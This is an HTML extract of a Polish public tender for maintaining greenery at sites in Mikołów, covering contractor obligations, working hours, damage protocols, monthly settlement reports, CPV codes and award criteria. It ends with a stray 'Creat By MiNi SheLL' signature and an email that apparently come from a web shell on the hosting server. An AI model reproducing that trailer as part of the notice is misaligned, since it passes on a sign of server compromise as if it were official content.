W przypadku zniszczeń spowodowanych ciężkim sprzętem Wykonawca jest zobowiązany do zastosowania innej technologii oraz przywrócenia zniszczonych terenów do stanu pierwotnego. Zamawiający nie przewiduje możliwości magazynowania sprzętu Wykonawcy na terenie CEPiE OGRÓD. 
Wykonawca będzie wykonywał usługę w dni powszednie od poniedziałku do piątku w godzinach od 6.00 do 22.00. W uzasadnionych przypadkach, po uzyskaniu zgody przedstawiciela Zamawiającego dopuszcza się możliwość pracy w soboty i niedziele. Wykonawca ma obowiązek zapewnić taką organizację pracy, która zagwarantuje ciągłe funkcjonowanie obiektu. Wykonawca zobowiązuje się na swój koszt zabezpieczyć miejsce wykonywania prac oraz zapewnić wszelkie warunki bezpieczeństwa.
W czasie wykonywania robót  Wykonawca zobowiązany jest do utrzymania terenu prac w stanie wolnym od przeszkód komunikacyjnych oraz będzie na swój koszt usuwał i składował poza terenem wykonywania robót wszelkie urządzenie pomocnicze oraz zbędne materiały i odpady.
W przypadku zaistnienia szkody w przedmiocie umowy jak i mieniu zlokalizowanym na terenie CEPIE OGRÓD (wiaty drewniane, lampy podświetlające ziemne, skrzynki elektryczne, kosze, ławki tablice). Wykonawca zobowiązany jest niezwłocznie powiadomić o tym fakcie Zamawiającego i sporządzić dwustronny protokół na okoliczność zaistniałej szkody. 
Wykonawca zobowiązany będzie do przedstawiania comiesięcznych raportów Protokół odbioru z wyliczeniem realizacji usługi stanowiącym iloczyn rzeczywiście wykonanych prac oraz ich ceny jednostkowej przyjętej wg stawek kosztorysu ofertowego stanowiące podstawę rozliczenia pomiędzy Zamawiającym i Wykonawcą. 
Ww  protokół potwierdzony przez przedstawiciela Wykonawcy i Zamawiającego stanowić będzie podstawę do rozliczenia robót i wypłaty wynagrodzenia jak również określał będzie warunki i terminy usunięcia przez Wykonawcę ewentualnych stwierdzonych wad w miesiącu następnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Utrzymanie i pielęgnacja terenów zieleni na terenie Kompleksu sportowo - rekreacyjnego w Mikołowie ul. Żwirki i Wigury 45.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wielkość i zakres zamówienia podana w Sekcji II 1.4.
Wymagania dot. realizacji przedmiotu zamówienia przez Wykonawcę.   
Wykonawca zobowiązuje się wykonać usługę  przy użyciu  sprawnie działającego sprzętu i narzędzi zgodnie z obowiązującymi przepisami bezpieczeństwa ppoż., bhp, oraz ochrony środowiska. Parametry sprzętu winne być dostosowane do istniejącej infrastruktury. W przypadku zniszczeń spowodowanych ciężkim sprzętem Wykonawca jest zobowiązany do zastosowania innej technologii oraz przywrócenia zniszczonych terenów do stanu pierwotnego. Zamawiający nie przewiduje możliwości magazynowania sprzętu Wykonawcy na terenie  Kompleksu. Wykonawca będzie wykonywał usługę w dni powszednie od poniedziałku do piątku w godzinach od 6.00 do 22.00. W uzasadnionych przypadkach, po uzyskaniu zgody przedstawiciela Zamawiającego dopuszcza się możliwość pracy w soboty i niedziele. 
Wykonawca ma obowiązek zapewnić taką organizację pracy, która zagwarantuje ciągłe funkcjonowanie obiektu. Wykonawca zobowiązuje się na swój koszt zabezpieczyć miejsce wykonywania prac oraz zapewnić wszelkie warunki bezpieczeństwa.
W czasie wykonywania robót  Wykonawca zobowiązany jest do utrzymania terenu prac w stanie wolnym od przeszkód komunikacyjnych oraz będzie na swój koszt usuwał i składował poza terenem wykonywania robót wszelkie urządzenie pomocnicze oraz zbędne materiały i odpady.
W przypadku zaistnienia szkody w przedmiocie umowy jak i mieniu zlokalizowanym na terenie Kompleksu (ogrodzenie z paneli, nawierzchnia poliuretanowa bieżni, urządzenia  lekkoatletyczne, wiaty dla zawodników, trybuny sportowe i zaplecze szatniowe,). Wykonawca zobowiązany jest niezwłocznie powiadomić o tym fakcie Zamawiającego i sporządzić dwustronny protokół na okoliczność zaistniałej szkody.  
Wykonawca zobowiązany będzie do przedstawiania comiesięcznych raportów Protokół odbioru z wyliczeniem realizacji usługi stanowiącym iloczyn rzeczywiście wykonanych prac oraz ich ceny jednostkowej przyjętej wg stawek kosztorysu ofertowego, stanowiące podstawę rozliczenia pomiędzy Zamawiającym i Wykonawcą. W/w protokół potwierdzony przez przedstawiciela Wykonawcy i Zamawiającego stanowić będzie podstawę do rozliczenia robót i wypłaty wynagrodzenia jak również określał będzie warunki i terminy usunięcia przez Wykonawcę ewentualnych stwierdzonych wad w miesiącu następny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com